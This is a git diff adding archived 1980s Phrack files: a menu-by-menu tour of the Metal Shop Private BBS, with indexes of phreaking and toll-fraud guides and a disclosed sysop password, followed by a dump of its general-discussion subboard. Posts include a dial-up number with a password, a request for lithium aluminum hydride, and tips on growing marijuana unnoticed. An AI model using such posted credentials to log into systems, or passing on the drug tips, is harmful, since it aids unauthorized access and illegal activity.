+82: PWN VII Part II by Knight Lightning
+83: Intro to Phrack IX
+84: Phrack Pro-Phile 6
+85: Fun With the Centagram VMS Network
+86: Programming RSTS/E File2: Editors
+87: Inside Dialog by Ctrl C
+88: Plant Measurement by The Executioner
+89: Multi-User Chat Program for DEC-10's
+90: Introduction to Videoconferencing by KL
+91: Loop Maintenance Operations System
+92: PWN VIII by Knight Lightning
+93: Phrack X Index by Taran King
+94: Pro-Phile VII on Dave Starr by TK
+95: The TMC Primer by Cap'n Crax
+96: A Beginner's Guide to IBM VM/370
+97: Circuit Switched Digital Capability
+98: Hacking Primos Part I by Evil Jay
+99: ANI by Doom Prophet and Phantom Phreaker
+100: Phrack World News IX Part I by KL
+101: Phrack World News IX Part II by KL
+102: Phrack XI Index by Taran King
+103: Pro-Phile VIII on Wizard of Arpanet
+104: Prefix Access Code Translator by Exy
+105: Hacking Voice Mail Systems
+106: Simple Data Encryption by The Leftist
+107: AIS - Automatic Intercept System by TK
+108: Hacking Primos I,II,III by Evil Jay
+109: Telephone Signalling Methods by DP
+110: Cellular Spoofing from Amadeus
+111: Busy Line Verification by P.Phreaker
+112: Phrack World News X by Knight Lightning
+113: Phrack World News XI by Knight Lightning
+114: Phrack XII Index by Taran King
+115: Pro-Phile IX on Agrajag The Prolonged
+116: The Life & Times of The Executioner
+117: Understanding DMS Part I by Control C
+118: The Total Network Data System by DP
+119: CSDC II - Hardware Requirements by Exy
+120: Hacking : OSL Systems by Evil Jay
+121: Busy Line Verification Part II by PP
+122: Scan Man's Rebuttal to PWN
+123: Phrack World News XII Part I by KL
+124: Phrack World News XII Part II by KL
+
+
+Gfiles: (1-124, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^2),L,Q : 3
+
+ Phrack Inc. II
+
+1: Phrack 13 Index by Taran King
+2: Real Phreaker's Guide Vol 2 by TK and KL
+3: How to Fuck Up the World by UrLord
+4: How to Build a Paisley Box by TC and DH
+5: Phreaks In Verse by Sir Francis Drake
+6: R.A.G. - Rodents Are Gay by Evil Jay
+7: Are You A Phone Geek? by Doom Prophet
+8: Computerists Underground News Tabloid
+9: RAGS - The Best of Sexy Exy
+10: Phrack World News XIII by KL
+
+
+Gfiles: (1-10, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^3),L,Q : 4
+
+ Phreak Philes
+
+1: Better Homes and Blue Boxing Part I
+2: Better Homes and Blue Boxing Part II
+3: Better Homes and Blue Boxing Part III
+4: The Art and Practice of Blue Boxing
+5: 2600 Single Tone Generator
+6: Portable Blue Box Plans by Ford Prefect
+7: Blue Box Plans with XR-2207 Chip
+8: How to Build a Black Box + Mainframes
+9: Red Boxing with Whistles by Researcher
+10: White Box
+11: Creation of a Silver Box by The Mace
+12: Solid State Silver Boxes by Number Six
+13: Clear Box
+14: Into a Cheese Box by Sir Knight
+15: The Green Box by Blue Buccaneer
+16: Chrome Box Diagrams
+17: Brown Box Plans by The Doc
+18: Gold Box Plans by Sir William
+19: How-To-Series Part III: Tron Box
+20: How to Construct a Purple Box
+21: The Conference Box by Madd Max
+22: Bud Box Plans Revision 2.0
+23: Introducing: The Beige Box
+24: The Aqua Box by The Traveler
+25: Bottle-Nosed Dolphin Grey Box
+26: The Rainbow Box: It Really Exists!
+27: Make Your Dog Into A Cheesebox
+28: Urine Box Plans
+29: Scarlet Box Plans by The Pimp
+30: The Sand Box from High Mountain Hackers
+31: How to make a Pearl Box by Dr. D-Code
+32: Making The Lunch Box by Dr. D-Code
+33: Acrylic Box Plans by The Pimp
+34: Crimson Box Plans by Dr. D-Code
+35: How to Build a Blotto Box
+36: Building Your Own Switchboard
+37: The Poor Man's 2600 Hertz by Sir Briggs
+38: The Myth of the 2600 Hz Detector
+39: Verification by Fred Steinbeck
+40: Verification by Forest Ranger
+41: Busy Verification Conference Circuit
+42: How to 'Blue Box' into 'Russia'
+43: Electronic Toll Fraud Devices
+44: Boxtones by The Pyro
+45: The Joy of "Boxing" by The Dragyn
+46: Phree Calls by The Seker
+47: Boxing Around the World by **Mob-Rules**
+48: Routing and System Codes Part I
+49: Blue Boxing Numbers (1-800's)
+50: City Conference Computer by Tom Tone
+51: Teleconferencing Phone Numbers
+52: Essence of Telephone Conferencing
+53: The World of Teleconferencing
+54: Alliance Teleconferencing
+55: The Call Waiting Tap by The Byte
+56: Wiretapping by an Unknown Author
+57: Tapping Computer Data is Easy
+58: Pen-Registering and Tracing
+59: Bell Tones by Compy
+60: Bell Hell Volume 1 by The Dutchman
+61: Bell Hell Volume 2 by The Dutchman
+62: Bell Hell Volume 3 by The Dutchman
+63: Telephone & Communication Sabotage
+64: Thrashing Ma... by Baby Demon
+65: GTE Recordings... by Baby Demon
+66: Carrier Identification Codes Listing
+67: Equal Access Override Codes
+68: Equal Access and Modem Autodialers
+69: Page-A-Fone Beepers by Lefty Carlson
+70: A Guide to A.D.S. Systems Part I
+71: Exploring Caves in Travelnet
+72: Calling Card Secrets from Pirate 80
+73: Japan Embassy of the USSR by Mad Marvin
+74: Transmission Test Line and Terminations
+75: NWB's Infoline by The Sensei
+76: Tones & Announcements "Description"
+77: The Origin of Phreaking
+78: The Phreaker's Bible by BIOC Agent 003
+79: The Phreaker's Handbook by Cat-Trax
+80: Phreak Reading List '86 from CEO
+81: The Fine Art of Scanning
+82: Phun with Fortress Fones by Surf Rat
+83: The Phun of International Calling
+84: AT&T Newslines
+85: CN/A, MCI, & Metrophone Directory
+86: Accessing Numbers by The Arabian Knight
+87: CN/A List by The Pyrite
+88: The Complete -> 800 <- by The Traveler
+89: The Truth Behind Those 9999 Numbers
+90: How to Fight Sprint by Grandmaster Flash
+91: AT&T International Dialing Country Codes
+92: The Federal Black Pages by Line Breaker
+93: The 976 Exchange
+94: 950 Prefix by The Courier
+95: The Phreaker's Guide to Loop Lines
+96: The Book of 'Loops' from TuSwF
+97: Loops
+98: Understanding PBX Systems by The Sensei
+99: Centrex Renaissance "The Technology"
+100: Diverters: What They Are and How to Use
+101: Intro to AUTOVON Pt. 1 by ShAdOwRuNnEr
+102: Intro to AUTOVON Pt. 2 by ShAdOwRuNnEr
+103: Intro to AUTOVON Pt. 3 by ShAdOwRuNnEr
+104: AUTOVON Prefixes by ShAdOwRuNnEr
+105: Your Rights as a Phone Phreak
+106: Computer Fraud Laws by CEO
+107: 2084: A Phone Odyssey
+108: Home Phone Tips
+109: General Phone Information by The Ace
+110: Bell Special Intelligence Force
+111: Basics of Telecommunications by KL
+112: The History of Telecommunications by KL
+113: The History of British Phreaking
+114: USTA '86 by Executive Hacker/Pro.Phreak
+115: Switching Equipment by The Diamond
+116: ESS: Orwell's Prophecy from BIOC Agent 3
+117: Electronic Switching Advances by BIOC
+118: The History of ESS by Lex Luthor
+119: Interesting Things to do on Step Lines
+120: Tellabs' 7002 Dial Long Line Module
+121: Tandems by Forest Ranger
+122: Article on CLASS/LASS
+123: LASS Features from Executioner of PLP
+124: How To Use Call-Waiting Cancel Feature
+125: The Integrated Services Digital Network
+
+126: ISDN Volume I by Zandar Zan
+127: ISDN Volume II by Zandar Zan
+128: Incoming Trunk Service Observing by Exy
+129: Prefix Access Code Translater by Exy/PLP
+130: Equal Access and the American Dream
+131: The Relationship Between Carot & ROTL
+132: TSPS Coin Control Signals by Scan Man
+133: Coin Services by The (414) Wizard
+134: ANI & ONI by The *ELITE* Phreakers Club
+135: Radio Packet Frequencies
+136: Picture Phone
+137: AT&T Forgery by The Blue Buccaneer
+138: Cellular Phreaking by The Bootlegger
+139: Making & Taking Advantage of 3-Way Fones
+140: How to Listen in on Cordless Telephones
+141: AT&T Remote Terminal Cabinets by Dr.Doom
+142: Phucked Agent 04s Terminal Hardware File
+143: The Craft Access Terminal from Tuc
+144: Dealing with the Rate & Route Operator
+145: Shadow 2600/Kid & Co.'s Chat w/a Lineman
+146: TAS Lingo Simplified
+147: Bell System Common Language by Sensei
+148: The Bell Glossary by Mad Marvin
+149: Just Some Telco Terms by Zandar Zan
+150: A Little Something About Your Phone Co.
+151: Something of Interest About the Telco
+
+
+Gfiles: (1-151, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^4),L,Q : 5
+
+ Phreak Philes II
+
+1: Pink Box Plans by Einstein and AE Angel
+2: Olive Box Plans by Arnold
+3: The Neon Box by Mad Hatter
+4: The Blast Box by Shadowhawk I
+5: Mirror Box by Fatal Error
+6: Frequency Generator by Captain Quieg
+7: Handy Telephone Circuits by Eye-No Phonz
+8: How to Build a Linesman's Handset
+9: Switching Systems by Terminus
+10: Electronic Switching in the U.S.
+11: Fiber Optics by Celtic Phrost
+12: Basic Signaling by Asmodeus Rex
+13: Network Transmission Notes by Terminus
+14: Tone List by The Bootleg
+15: The Equal Access Hacker's Guide
+16: The Numbering Plan by Terminus
+17: Using Diverters by Galactus and Blitziod
+18: Understanding The Computer-Based PBX
+19: Understanding PBX Systems by Terminus
+20: ROLM/NET by Celtic Phrost
+21: Mobile Phone Repeaters by Bellcon
+22: Illinois Bell Information Bulletin
+23: The Phreak Chronicles: REMOBs
+24: Fast Data Encryption by Spartacus
+25: Merry Pranksters from BIOC Agent 003
+26: International Numbers by The Comedian
+
+
+Gfiles: (1-26, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^5),L,Q : 6
+
+ Series/Articles
+
+1: BIOC's Basic Telecom-Table of Contents
+2: BIOC's Basic Telecom I
+3: BIOC's Basic Telecom II
+4: BIOC's Basic Telecom III
+5: BIOC's Basic Telecom IV
+6: BIOC's Basic Telecom V
+7: BIOC's Basic Telecom VI
+8: BIOC's Basic Telecom VII
+9: MCI Glossary Part I by Knight Lightning
+10: MCI Glossary Part II by Knight Lightning
+11: MCI Glossary Part III by Knight Lightning
+12: MCI Glossary Part IV by Knight Lightning
+13: MCI Glossary Part V by Knight Lightning
+14: Syndicate Report Issue 1 by The Sensei
+15: Syndicate Report Issue 2 by The Sensei
+16: Syndicate Report Issue 3 by The Sensei
+17: Syndicate Report Issue 4 by The Sensei
+18: Syndicate Report Issue 5 by The Sensei
+19: Syndicate Report Issue 6 by The Sensei
+20: Syndicate Report Issue 7 by The Sensei
+21: Syndicate Report Issue 8 by The Sensei
+22: Syndicate Report Issue 9 by The Sensei
+23: Syndicate Report Issue 10 by The Sensei
+24: Syndicate Report Issue 11 by The Sensei
+25: Telecom World Monthly I File 1
+26: TWM I File 2 by The Specialist
+27: TWM I File 3 by The Specialist
+28: TWM I File 4 by The Specialist
+29: TWM I File 5 by The Specialist
+30: TWM I File 6 by The Specialist
+31: TWM I File 7 by The Specialist
+32: TWM I File 8 by The Specialist
+33: TWM I File 9 by The Specialist
+34: TWM I File 10 by The Specialist
+35: TWM I File 11 by The Specialist
+36: TWM I File 12 by The Specialist
+37: TWM I File 13 by The Specialist
+38: TWM I File 14 by The Specialist
+39: TWM I File 15 by The Specialist
+40: TWM I File 16 by The Specialist
+41: TWM I File 17 by The Specialist
+42: TWM II File 1 by The Specialist
+43: TWM II File 2 by The Specialist
+44: TWM II File 3 by The Specialist
+45: TWM II File 4 by The Specialist
+46: TWM II File 5 by The Specialist
+47: TWM II File 6 by The Specialist
+48: TWM II File 7 by The Specialist
+49: TWM II File 8 by The Specialist
+50: TWM II File 9 by The Specialist
+51: TWM II File 10 by The Specialist
+52: TWM II File 11 by The Specialist
+53: TWM II File 12 by The Specialist
+54: TWM II File 13 by The Specialist
+55: TWM II File 14 by The Specialist
+56: TWM II File 15 by The Specialist
+57: TWM II File 16 by The Specialist
+58: H.A.C.K. Volume I by Grey Wolf
+59: H.A.C.K. Volume 2 by Grey Wolf
+60: H.A.C.K. Volume 3 by Grey Wolf
+61: H.A.C.K. Volume 5 by Grey Wolf
+62: H.A.C.K. Volume 6 by Dr. Pepper
+63: H.A.C.K. Volume 8 by Grey Wolf
+64: H.A.C.K. Volume 9 by Grey Wolf
+65: Phortune 500 Newsletter Issue 1
+66: Phortune 500 Newsletter Issue 2
+67: Telecom & Sports Newsletter 2
+68: All Net Newsletter
+69: Journal of Telecom: Contents and Info
+70: Journal of Telecom: Bell Cabinets & Cans
+71: Journal of Telecom: Implementing ISDN
+72: Journal of Telecom: Telecom Times
+73: Journal of Telecom: The Showroom
+74: Journal of Telecom: Int'l Calling Guide
+75: MetalliBashers Inc. FanZine 1
+76: MetalliBashers Inc. FanZine 2
+77: MetalliBashers Inc. FanZine 3
+78: MetalliBashers Inc. FanZine 4
+79: TAP Interviews by "The Infiltrator"
+80: TAP Issue 27
+81: Revenge of the Hackers Article
+82: The Adventures of Captain Midnight
+83: Further Adventures of Captain Midnight
+
+
+Gfiles: (1-83, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^6),L,Q : Q
+
+T - 3:33:50
+Main > M
+
+
+T - 3:33:40
+Metal/General Discussion : ?
+
+
+                              Message Base Menu:
+                              ~~~~~~~ ~~~~ ~~~~~
+
+B:oard scan (new)   C:hange board       K:ill posts         L:ist boards
+N:ew scan all subs  P:ost message       S:can board         Q:uit
+
+
+
+
+T - 3:33:37
+Metal/General Discussion : Q
+
+
+T - 3:33:36
+Main > N
+
+(This was a section called N:eed acronyms, which was a database of phreak/hack
+ related acronyms.  The users could contribute to it or use it as a reference
+ (as shown below).  The final list is also included in this final issue of
+ Phrack.)
+
+T - 3:33:32
+Acronyms> ?
+
+
+                              Acronym Commands:
+                              ~~~~~~~ ~~~~~~~~~
+
+A:dd an acronym    L:ist all acronyms   S:earch for acronym          Q:uit
+
+
+
+
+
+
+T - 3:33:30
+Acronyms> S
+Search for what ? BL
+BLF  Busy Line Field
+BLS  Business Listing Service
+BLV  Busy Line Verification
+
+
+
+T - 3:33:13
+Acronyms> Q
+
+
+T - 3:33:11
+Main > S
+
+
+T - 3:33:01
+Status> ?
+
+
+                                 Status Menu:
+                                 ~~~~~~ ~~~~~
+
+C:hange password    D:efault settings   M:acro change       Q:uit to main
+U:serlist           Y:our info
+
+
+
+
+
+
+T - 3:32:58
+Status> Y
+Your name      : Taran King 1
+Phone number   : MSP-314-SLAY
+Mail waiting   : 0
+Sec Lev        : 255
+Last on        : 07/28/87
+Times on       : 1080
+On today       : 1
+Messages posted: 272
+E-mail sent    : 452
+Messages       : Validated
+Backspacing    : On
+
+
+T - 3:32:48
+Status> U
+AGRAJAG THE PROLONGED 53
+ANONYMOUS MECHANIC 40
+ARTHUR DENT 6
+AX MURDERER 7
+BEER WOLF 4
+BILL FROM RNOC 44
+BREW ASSOCIATES 9
+CAP'N CRAX 10
+CARRIER CULPRIT 11
+CAT MAN 12
+CHEAP SHADES 3
+CIRCUIT BREAKER 5
+COMPUTER WIZ KID 54
+CONTROL C 8
+CRIMSON DEATH 14
+DATA DEMON 25
+DATA LINE 16
+DAVE STARR 35
+DOOM PROPHET 21
+ELRIC OF IMRRYR 37
+EVIL JAY 26
+FEYD RAUTHA 24
+GARY SEVEN 55
+HIGH EVOLUTIONARY 28
+HIGHLANDER 45
+ICARUS 15
+JESTER SLUGGO 31
+JOE COOL 32
+KERRANG KHAN 34
+KNIGHT LIGHTNING 2
+LEX LUTHOR 36
+LOD/H TECHNICAL JOURNAL 33
+LORD FOUL 77
+LOTUS 38
+LUCIFER 666 43
+MAD HATTER 51
+MAD MAX 39
+MARK TABAS 27
+PANAMA RED 101
+PHANTOM PHREAKER 46
+PHREAKY FLOYD 30
+PHUCKED AGENT 04 29
+RANDY HOOPS 41
+RANDY SMITH 42
+REVEREND ENGE 48
+RYCHE 49
+S.K. ERICKSON 50
+SALLY RIDE 52
+SILVER SPY 57
+SIR FRANCIS DRAKE 56
+SLAVE DRIVER 58
+TARAN KING 1
+THE DISK JOCKEY 13
+THE EGYPTIAN LOVER 93
+THE EXECUTIONER 19
+THE LEFTIST 71
+THE LINEMAN 72
+THE MAD HACKER 47
+THE MARAUDER 22
+THE MARK 73
+THE MENTOR 74
+THE PROPHET 23
+THE SCANNER 20
+THE SENSEI 18
+THE SPECTRE 82
+THOMAS COVENANT 84
+TUC TUCBBS 86
+VMS CONSULTANT 17
+
+
+T - 3:32:33
+Status> Q
+
+
+T - 3:32:25
+Main > U
+
+(This is the U:ser Data Base which was used only by an exclusive group of
+ sysops and co-sysops of this and other boards.  It included userlists and
+ lists of members of various phreak/hack groups.)
+
+T - 3:32:21
+D-Base > ?
+
+
+                             User Data Base Menu:
+                             ~~~~ ~~~~ ~~~~ ~~~~~
+
+G:lobal string search   L:ist boards or groups available   P:rint 1 log/group
+Q:uit to main menu      S:earch individually               ?:This menu
+
+
+
+
+T - 3:32:16
+D-Base > L
+Boards on file
+1. HPO (92686)
+2. Atlantis (92686)
+3. Stalag 13 (92686)
+4. The Abyss (92686)
+5. Gates of Hell(92786)
+6. Speed Demon (92986)
+7. RACS III (11-2-86)
+8. Catch-22 (92386)
+9. P-80 (11-2-86)
+10. ShadowSpawn(11-2-86)
+11. FreeWorld 2(11-3-86)
+12. Greek Inn (111686)
+13. Priv.Sector(112486)
+14. PK2600 (112186)
+15. C0SMOS '84
+16. Data Center(12-1-86)
+17. Ripco (121186)
+18. Brewery (121986)
+19. Danger Zone (122086)
+20. Quick Shop (122086)
+21. HackerHaven (121486)
+22. Thieve'sWorld (1214)
+23. Hacks R Us (122486)
+24. PhantasieRealm(41287
+25. Stronghold E (32986)
+26. Greenhouse (42187)
+
+Groups on file
+1. Metal Communications
+2. Neon Knights
+3. 2300 Club
+4. Legion Of Hackers
+5. Legion Of Doom
+6. Lunatic Labs, UnLtd.
+7. PhoneLine Phantoms
+8. The Administration
+9. Team Hackers
+10. Tribunal Of Knowlege
+11. The Punk Mafia
+12. Red Dawn Text Files
+13. Phrk/Hack Destroyers
+14. Phrk/Hck Delinquents
+15. The Warelords
+16. The Apple Mafia
+17. MetalliBashers, Inc.
+18. The Hitchhikers
+19. Knights Of Shadow
+20. Fargo 4A
+21. The Association
+22. Hack-A-Trip
+23. The Stowaways
+24. Black Bag
+25. MAD!
+26. PAWW
+27. The P.H.I.R.M.
+28. 65C02
+29. CEO
+30. PHido PHreaks
+31. The 414s
+32. KOTRT
+33. Inner Circle I
+34. Inner Circle II
+35. Camorra
+36. SABRE
+37. The Federation
+38. AmericanToneTravelrs
+39. Five O
+40. Extasyy EliteNetwork
+41. Order Of The Rose
+42. Cult of the Dead Cow
+43. OSS
+44. Phortune 500
+45. The DEC Hunters
+46. The Marauders
+47. 2af
+48. Md/Phd
+49. ICUB
+50. Phrk/Hcks of America
+51. C&M Productions
+52. Software Pirates,Inc
+53. DTE222
+54. Legion Of Darkness
+55. Coast To Coast
+56. Elite Hackers Guild
+57. 2600 Club
+58. The Rackateers
+59. The Nihilist Order
+60. The IBM Syndicate
+
+
+T - 3:31:54
+D-Base > G
+B)oard or G)roup : B
+Search for what string : KNIGHT LIGHTNING
+KNIGHT LIGHTNING was found on HPO (92686)
+KNIGHT LIGHTNING was found on Atlantis (92686)
+KNIGHT LIGHTNING was found on RACS III (11-2-86)
+KNIGHT LIGHTNING was found on Catch-22 (92386)
+KNIGHT LIGHTNING was found on P-80 (11-2-86)
+KNIGHT LIGHTNING was found on Brewery (121986)
+KNIGHT LIGHTNING was found on Quick Shop (122086)
+KNIGHT LIGHTNING was found on PhantasieRealm(41287
+KNIGHT LIGHTNING was found on Stronghold E (32986)
+
+
+T - 3:31:20
+D-Base > Q
+
+
+T - 3:31:16
+Main > V
+Current Questions:
+
+  1: How shall the board be run?
+  2: Are you coming to SummerCon?
+  3: Is your sysop a banana?
+  4: What was your favorite Phrack 13 file?
+  5: What file did you hate most in Phrack 13?
+
+
+Which question (
+,Q,?) : 1
+Question 1:
+How shall the board be run?
+Users voting:  56.7%
+
+0:No Comment
+1:More privately!           : 18  47.4%
+2:The same way it has been. : 19  50.0%
+3:More opened.              :  0   0.0%
+4:Closed totally.           :  1   2.6%
+
+
+Your vote: More privately!
+Change it? No
+
+
+Which question (,Q,?) : 2
+Question 2:
+Are you coming to SummerCon?
+Users voting:  55.2%
+
+0:No Comment
+1:Definitely!               : 10  27.0%
+2:No, definitely not.       : 11  29.7%
+3:Probably.                 :  9  24.3%
+4:Possibly with a ride.     :  6  16.2%
+5:What's SummerCon (STUPID) :  1   2.7%
+
+
+Your vote: Definitely!
+Change it? No
+
+
+Which question (,Q,?) : 3
+Question 3:
+Is your sysop a banana?
+Users voting:  32.8%
+
+0:No Comment
+1:Yes.                      :  1   4.5%
+2:No.                       :  1   4.5%
+3:What are you talkin about :  2   9.1%
+4:No, other assorted fruit  :  7  31.8%
+5:I'm not a vegetarian...   :  4  18.2%
+6:KL's a banana, not TK     :  4  18.2%
+7:SFD has a banana fetish   :  3  13.6%
+
+
+Your vote: SFD has a banana fetish
+Change it? No
+
+
+Which question (,Q,?) : 4
+Question 4:
+What was your favorite Phrack 13 file?
+Users voting:  37.3%
+
+0:No Comment
+1:Real Phreaker's Guide 2   :  1   4.0%
+2:How to Fuck Up the World  :  2   8.0%
+3:Making the Paisley Box    :  1   4.0%
+4:Phreaks In Verse          :  2   8.0%
+5:R.A.G - Rodents Are Gay   :  2   8.0%
+6:Are You A Phone Geek?     :  1   4.0%
+7:CUNT                      :  1   4.0%
+8:RAGS - Best of Sexy Exy   : 11  44.0%
+9:PWN XIII                  :  4  16.0%
+
+
+Your vote: R.A.G - Rodents Are Gay
+Change it? No
+
+
+Which question (,Q,?) : 5
+Question 5:
+What file did you hate most in Phrack 13?
+Users voting:  37.3%
+
+0:No Comment
+1:Real Phreaker's Guide 2   :  1   4.0%
+2:How to Fuck Up the World  :  4  16.0%
+3:Building a Paisley Box    :  2   8.0%
+4:Phreaks In Verse          :  1   4.0%
+5:R.A.G. - Rodents Are Gay  :  4  16.0%
+6:Are You A Phone Geek?     :  1   4.0%
+7:CUNT                      :  0   0.0%
+8:RAGS - Best of Sexy Exy   : 11  44.0%
+9:PWN XIII                  :  1   4.0%
+
+
+Your vote: Real Phreaker's Guide 2
+Change it? No
+
+
+Which question (,Q,?) : Q
+
+
+T - 3:30:39
+Main > !
+
+(This is the sysop menu.  Remote modifications were available through this
+ section, but the functions were rarely utilized.)
+
+T - 3:30:26
+Sysop> ?
+
+
+Co-Sysop Menu:
+
+B:oard editing      C:hange user        F:ast validation    G:file Edit
+L:og of today       M:ail reading       O:ld users          Q:uit to main
+S:ystem status      V:oting booth edit  Y:esterday's log
+
+Sysop Only:
+
+D:OS shell          T:-file editor      ~:take the board down
+
+
+
+T - 3:29:41
+Sysop> Q
+
+
+T - 3:29:38
+Main > O
+
+(If you didn't want to see all this B.S., the Fast Logoff "-" worked from
+ almost everywhere.)
+
+Hangup?  Sure? Yes
+
+   Takin' off so soon?  Outta time?
+Outta luck?  Well, come back soon and
+remember not to spread this to every-
+one and anyone...PRIVATE!  Keep
+thrashing!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Well, that's pretty much all of what was on the board for the most part.  There
+were a few more things like the format on the upper part of the screen which
+was windowed off from what was happening on the board which contained the
+on-line user's information and other things only the sysop would see, but
+nothing about it was too interesting.  I hope you enjoyed seeing all of the
+things contained on what used to be my board, and I hope you were both suprised
+and let down at the same time.  That's the way it should be because it was, as
+I so often said, over-rated.  Anyway, I'd like to acknowledge the fact that
+both Control C and The Mad Hacker were going to run Metal Shop Private after my
+problems arose, but Control C had some problems of his own and after he got the
+program, he lost it and The Mad Hacker would have run it, but I received notice
+about something concerning the board which convinced me to keep it down
+forever.  It's all still intact like I said, but it's probably just going to
+sit on my hard drive until my father needs more room on the hard drive for
+Lotus 1-2-3 or something and it'll get formatted over.
+
+Oh, one last note:  For those of you who thought you were hackers and attempted
+to get my password (which never happened in the history of the board), it was
+"ME?CRAZY", my phone number was MSP-314-SLAY, and the secondary password
+necessary to log on as a sysop remotely was "LASHING."
+
+                                            Taran King
+                                            Knight Lightning
+                                            Cheap Shades
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/5.txt b/phrack20/5.txt
new file mode 100644
index 0000000..7b593c3
--- /dev/null
+++ b/phrack20/5.txt
@@ -0,0 +1,1926 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 5 of 12
+
+
+               Metal Shop Private's -- Metal/General Discussion
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Metal/General Discussion subboard was exactly what it sounded like.
+Messages varied from stuff about music to political events as you will plainly
+see.
+
+1/100: rowdy!
+Name: The Scanner 20
+Date: 11:58 am  Mon Apr 27, 1987
+
+ Hey, I got the same two posters with the exception of one thing, They say
+Spring Break '87 - Daytona Beach. Anyhow, My Easter Sunday went pretty well, I
+awoke at about 10am with the sun streaming through the window and trying to
+make its way through the beer tower. I rolled over to the sound of the ocean
+waves hitting the coast. I got up opened one of last nights beers and walked
+out onto the balcony intern seeing a great view of Daytona Beach.  The rest of
+the day went pretty much the same way.
+
+                       _-The Scanner
+
+By the way, if you got a little time on your hands-
+
+313-851-0912
+pass = OPCODE
+.s
+
+
+
+2/100: chemicals
+Name: The Prophet 23
+Date: 1:01 pm  Mon Apr 27, 1987
+
+Anyone know where I can get ahold of Lithium Aluminum Hydride? Any help would
+be VERY appreciated!
+
+  -Rob
+
+
+
+3/100: *** Newsflash ***
+Name: Knight Lightning 2
+Date: 6:20 pm  Tue Apr 28, 1987
+
+At the request of the Management, we ask that all users change their passwords.
+There is no immidiate emergency, but forwarned is forearmed.  Please keep track
+of your logons and make your new passwords UN-hackable.
+
+Thanks,
+
+The Management
+
+:Knight Lightning
+
+
+4/100: Subboards
+Name: Taran King 1
+Date: 2:39 pm  Wed Apr 29, 1987
+
+For those of you who are interested, I am offering the opportunity for you to
+run your own subboard of some kind.  I've got the space and if you've got a
+purposeful subboard idea that you'd like for a specific group or group of
+people or project, do leave feedback and we'll see what we can do.  How' s that
+for a nice sysop?
+-TK
+
+
+
+5/100: Gee
+Name: Knight Lightning 2
+Date: 5:49 pm  Wed Apr 29, 1987
+
+Hmm, you'd think that 5 subboards would be enough for anyone.  Oh well...
+
+
+:Knight Lightning
+
+
+
+
+6/100: That sounds good.
+Name: Evil Jay 26
+Date: 11:46 pm  Wed Apr 29, 1987
+
+   Sounds good to me. Too bad there are not that many people into Primos
+(sigh). I can just see it now: "Unix Hacking - Subop: Solid State."
+
+   Crax and I were talking about scams today and we came across an interesting
+topic. It seems that if someone orders something to you in your name (that you
+didnt pay for) you can keep it, unless the company decides to pay for its
+return or gets it back theirselves. I can understand that most people are not
+going to pay to have something shipped back to a company but the idea of
+"keeping it" doesnt sound right. Comments?
+
+-J
+
+
+7/100: neat-0
+Name: Slave Driver 58
+Date: 10:22 am  Thu Apr 30, 1987
+
+  I want to have a party sub, we can call it "the Party Allianzzce!" I can be
+sub 9, uh, oops! I mean sub 6...
+
+heeheehoohoo
+Steve Driver
+
+
+
+
+
+8/100: Telephone Quality
+Name: Jester Sluggo 31
+Date: 6:38 pm  Thu Apr 30, 1987
+
+Hmm.. I seem to get fairly bad connections to the BBS.  If any others of you
+get good connections to other BBS's, but always get a somewhat shitty
+connection here, please leave the Sysop Feedback.    thanks.
+
+ /
+ \
+ / luggo !!
+
+
+
+
+9/100: Connections...
+Name: Knight Lightning 2
+Date: 6:57 pm  Thu Apr 30, 1987
+
+I have been getting an occasional bad connection too, and I am local to MSP.
+What could be causing this?  I had a hum on my phone line a while back and I
+had Bell check it out and run some line check stuff and then it went away,
+perhaps Taran should do the same.
+
+:Knight Lightning
+
+
+
+10/100: Its a DNR d00d11!!10
+Name: Evil Jay 26
+Date: 9:31 pm  Thu Apr 30, 1987
+
+   Anyway, my connections to MSP are just fine. The only board I have problems
+with is Phantasie Realm.
+
+   Have a question for anyone who grows dope. Someone told me that the pigs
+have some kind of radar that they use when flying over the woods, fields..etc,
+that supposedly pick up plants that are growing less than two feet from each
+other. I dont see how this is possibly at all, but its kind of scary. Also, can
+anyone give me some good ideas on how to grow it. I already have about 50
+planted that are coming up quite well (Im in the money...!) and I use that shit
+they put on fields for fertilizer. I also germinate my seeds by putting them in
+wet paper towels in a dark place for a few days before planting them (sprouts
+up), about 2 inchs deep in garden soil (that shit you buy at k-mart thats
+supposed to be good dirt). That was a lame question, but I need to know...
+
+   Speaking of Phantasie Realm, we changed the format for the last time and it
+looks good. New advanced subs, killed all the assholes, lowe red the access of
+all the non-contributers, got plenty of files/space, and lots of msgs and
+discussions. Feel free to call and post the  around:
+(313)641-9649   New: CANON
+
+-J
+
+
+
+11/100: Dope sniffing
+Name: The Scanner 20
+Date: 8:14 am  Fri May 01, 1987
+
+ The plane radar idea could have some truth to it. I mean it is very possible .
+They use planes to control our traffic speed also.
+
+ I'm sure you have all seen those depth finder things on boats and stuff. Those
+things can tell you almost exactly whats underneath. Probably the same type of
+gadget the plane would use.  Sounds possible to me.
+
+                        _-The Scanner
+
+
+
+12/100: Knowing
+Name: Doom Prophet 21
+Date: 4:13 pm  Fri May 01, 1987
+
+Knowing the cops, they probably do have things like that, so they can go out
+and waste more money in the name of stupid bandwagoning tactics a la Ron and
+Nancy Reagan, William Bennett, Rehnquest and O'Connor (the latter two were
+appointed Supreme Court justices, screened by Ronald Reagan and Edwin Meese to
+make sure they were conservative and conformist enough to the rest of the
+senile warmonger's administration). Mor e and more money is being wasted in the
+name of their fucking law and order, their fucking 'Christianity', self
+righteousness, conservative viewpoints that deny people's civil rights (womens
+right to an Abortion, Roe Vs Wade decision, the firing of 1/2 of the Civil
+Rights Commission and probably replacing them with Reagan Lovers, and more).
+Now the cops will go to exteme lengths (this radar shit and Paraquat poisoning)
+to make sure that they can have their fucking recreational drugs which are
+perfectly legal while condemning us as criminals for engaging in other
+recreational drugs that are less harmful (but ILLEGAL of course, it makes all
+the difference. Laws are always right and fair, and manipulative enough by
+those in power as a small child would play with Ronald Reagan's shit, smearing
